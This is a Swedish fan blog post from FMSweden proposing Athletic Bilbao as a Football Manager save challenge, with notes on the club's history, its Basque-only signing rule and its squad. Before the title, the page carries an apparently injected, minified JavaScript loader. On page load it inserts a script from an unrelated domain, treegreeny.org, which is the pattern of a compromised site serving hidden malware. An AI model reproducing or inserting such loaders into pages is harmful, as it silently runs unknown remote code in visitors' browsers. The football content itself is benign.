;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Athletic Bilbao – FMSweden
Meny Stäng

Veckans inspiration: Athletic Bilbao

Eller ja, Athletic Club kanske de heter egentligen. Den baskiska klubben står i centrum för veckans inspiration denna gång. Redan år 1898 grundades klubben och är en av tre klubbar som tillhört den spanska högstaligan La Liga sedan skapandet 1929, tillsammans med Real Madrid och FC Barcelona. Något annat som dessa tre lag har gemensamt är att de är medlemsstyrda, vilket enligt undertecknad alltid tillför en extra krydda. Faciliteterna är strålande och arenan San Mames tar in över 50 000 åskådare. Första säsongen tippas Athletic Club hamna på en sjätteplats och det kan således vara en hyfsat lämplig utmaning att kunna blanda sig in toppstriden under den dryga månad det är kvar tills release för FM21.

Som de flesta säkert känner till så får Bilbaoklubben endast värva baskiska spelare, vilket förstås förminskar antalet möjliga värvningar. Men samtidigt underlättar det en del med tanke på att beslutsångesten försvinner i ganska hög grad och det innebär en extra utmaning att förhålla sig inom så strikta ramar. I truppen är de mest namnkunniga spelarna bland annat Inaki Williams, Iker Muniain, Inigo Martinez och Raul Garcia. Kan du vara managern som tar baskerna till den absoluta toppen i Spanien? Lycka till om du tar dig an denna save!

 

Club Athletic Bilbao logo.svg

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar